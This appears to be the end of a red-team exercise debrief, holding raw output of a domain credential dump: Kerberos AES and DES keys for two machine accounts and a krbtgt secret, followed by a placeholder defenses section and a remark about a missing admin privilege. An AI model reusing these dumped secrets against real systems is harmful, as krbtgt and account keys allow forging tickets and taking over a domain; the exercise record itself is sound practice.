WWW$:aes256-cts-hmac-sha1-96:c2800d8a6a4ea54ef715478b7faebf3784168dfd6551877f4ad89359d15597a1
WWW$:aes128-cts-hmac-sha1-96:f50d328095d9237501ad9af7f575fab2
WWW$:des-cbc-md5:07e083f883c41c68
LTV$:aes256-cts-hmac-sha1-96:99f2687454b7637acc5918b4fea5b0584ca609e83938fcc99457eb2fd28570f7
LTV$:aes128-cts-hmac-sha1-96:2dffce1ab3fa5df7cc514141267bfbbd
LTV$:des-cbc-md5:7f91ce91a77057d0
[*] ClearText passwords grabbed
krbtgt:CLEARTEXT:0x041a8b8c34f41d1212dcb50983d6af62704b316cdbcd37a0eaaacb7628e114ecadcb2372c84f840464c314e9389ad3aa1d65b8541ed55e0a279bcc5a6bb74a9e0e6eddcea70f3c0d3d5d20a89b6176dda655af6bea29f371b64fe7723188f3258f5d28be249ae4b4eb62ba0b7f08d46ea69f5df30df0b49e210ea1e5518e1359f7640202b04515928dd2a44b7f03e3fffed327c129f0357164007d3a7b34aa26b0223d3deddf7aa48f325960dd7a96c6a282ae6af46c84d971700585bc44ec376fa5f90e1a81fa5b0f37d1fc107aa91c5637c2382f4602e683d7cb19ddc68296e8b645552ee6f1f1a93cbf5c2f3cfdd041b8abd988250aa482ab848bbecc912fa531670155ed97772719ad3bdd38be49262f67aa26dfa668c113a5b39b314f32ae62abfe5918cd164d1d1c91b80026afd5454f61678120a0abdd0770756875fca71c36cf477ae3cf2a895723c2180e83f73fdf35aedcf5f5dca1c017d394cf79b7bc78004a826ba76377a5a37c3902aebbba022d1ff9cc61143f6ebc01d26267817e696a2ea8171b51e4ff136c933d85ce67a0a4ba2d5555c9154765325aa3711bed1d5e2132d6abb6256a08a22a3da1d264c7387d0a1f4243774acc2d5485ff927ab5f5a05d9afe82d4842f2956e0a8f295af5123066dcaee7ea9369e93b6c37a208ef4f300a0426f425957c140573c04d5f6b558690b5a4155bea08ff39d43
[*] Cleaning up...





Notable Defenses
Add content here...
Team Spirit Issues
David ward doesn't have admin priv on JD, red team flag would have been planted if permissions set properly